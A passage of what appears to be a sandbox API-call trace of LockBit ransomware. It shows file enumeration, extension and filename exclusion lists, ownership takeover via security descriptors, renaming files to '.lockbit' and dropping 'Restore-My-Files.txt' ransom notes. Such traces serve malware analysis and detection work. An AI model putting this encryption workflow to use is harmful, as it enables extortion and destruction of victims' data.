pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\") returned="" [0076.724] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned=".mui" [0076.724] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0076.724] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0076.724] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0076.724] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0076.725] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0076.725] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0076.725] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui.lockbit") returned 58 [0076.725] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\dvdmaker.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.726] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.726] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.726] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.726] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.727] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.727] RtlFreeAnsiString (AnsiString="\\") [0076.727] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3a8) returned 0x0 [0076.727] malloc (_Size=0x200) returned 0x77d800 [0076.727] NtQueryInformationToken (in: TokenHandle=0x3a8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0076.727] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.727] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.727] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.728] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.728] CloseHandle (hObject=0x3a8) returned 1 [0076.728] free (_Block=0x77d800) [0076.728] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\dvdmaker.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a8 [0076.728] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.728] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.728] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=51712) returned 1 [0076.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.729] ReadFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.737] malloc (_Size=0x8a) returned 0x77d800 [0076.737] NtSetInformationFile (FileHandle=0x3a8, IoStatusBlock=0x3d6c2dc, FileInformation=0x77d800, Length=0x8a, FileInformationClass=0xa) returned 0x0 [0076.740] free (_Block=0x77d800) [0076.740] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" | out: pszPath="C:\\\\Program Files\\DVD Maker\\en-US") returned 1 [0076.740] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US\\Restore-My-Files.txt") returned 54 [0076.740] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a8 [0076.741] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.741] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.741] WriteFile (in: hFile=0x3a8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0076.742] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x520150, dwReserved1=0x0, cFileName="OmdProject.dll.mui", cAlternateFileName="")) returned 1 [0076.743] lstrcmpiW (lpString1=".", lpString2="OmdProject.dll.mui") returned -1 [0076.743] lstrcmpiW (lpString1="..", lpString2="OmdProject.dll.mui") returned -1 [0076.743] PathFindExtensionW (pszPath="OmdProject.dll.mui") returned=".mui" [0076.743] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0076.743] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0076.743] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0076.743] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0076.743] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0076.744] lstrcmpiW (lpString1=".lockbit", lpString2=".mui") returned -1 [0076.744] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="OmdProject.dll.mui") returned 1 [0076.745] lstrcmpiW (lpString1="ntldr", lpString2="OmdProject.dll.mui") returned -1 [0076.745] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="OmdProject.dll.mui") returned -1 [0076.745] lstrcmpiW (lpString1="bootsect.bak", lpString2="OmdProject.dll.mui") returned -1 [0076.745] lstrcmpiW (lpString1="autorun.inf", lpString2="OmdProject.dll.mui") returned -1 [0076.745] lstrcmpiW (lpString1="thumbs.db", lpString2="OmdProject.dll.mui") returned 1 [0076.745] lstrcmpiW (lpString1="iconcache.db", lpString2="OmdProject.dll.mui") returned -1 [0076.745] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\en-US" | out: pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\") returned="" [0076.745] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned=".mui" [0076.745] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0076.745] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0076.745] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0076.745] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0076.745] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0076.746] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0076.746] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui.lockbit") returned 60 [0076.746] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\omdproject.dll.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.748] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.748] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.748] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.749] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.749] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.749] RtlFreeAnsiString (AnsiString="\\") [0076.749] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3a8) returned 0x0 [0076.749] malloc (_Size=0x200) returned 0x77d800 [0076.749] NtQueryInformationToken (in: TokenHandle=0x3a8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0076.749] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.749] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.749] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.750] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.750] CloseHandle (hObject=0x3a8) returned 1 [0076.750] free (_Block=0x77d800) [0076.750] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\omdproject.dll.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a8 [0076.750] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.750] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.750] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=12288) returned 1 [0076.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.752] ReadFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.757] malloc (_Size=0x8e) returned 0x77d800 [0076.757] NtSetInformationFile (FileHandle=0x3a8, IoStatusBlock=0x3d6c2dc, FileInformation=0x77d800, Length=0x8e, FileInformationClass=0xa) returned 0x0 [0076.760] free (_Block=0x77d800) [0076.760] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" | out: pszPath="C:\\\\Program Files\\DVD Maker\\en-US") returned 1 [0076.760] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\en-US\\Restore-My-Files.txt") returned 54 [0076.760] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.760] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x520150, dwReserved1=0x0, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 1 [0076.760] lstrcmpiW (lpString1=".", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.760] lstrcmpiW (lpString1="..", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.760] PathFindExtensionW (pszPath="WMM2CLIP.dll.mui") returned=".mui" [0076.760] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0076.760] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0076.760] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0076.760] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0076.761] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0076.761] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0076.762] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0076.762] lstrcmpiW (lpString1=".lockbit", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.762] lstrcmpiW (lpString1="ntldr", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.762] lstrcmpiW (lpString1="autorun.inf", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.762] lstrcmpiW (lpString1="thumbs.db", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.762] lstrcmpiW (lpString1="iconcache.db", lpString2="WMM2CLIP.dll.mui") returned -1 [0076.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\en-US" | out: pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\") returned="" [0076.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned=".mui" [0076.762] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0076.762] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0076.762] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0076.762] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0076.763] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0076.763] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 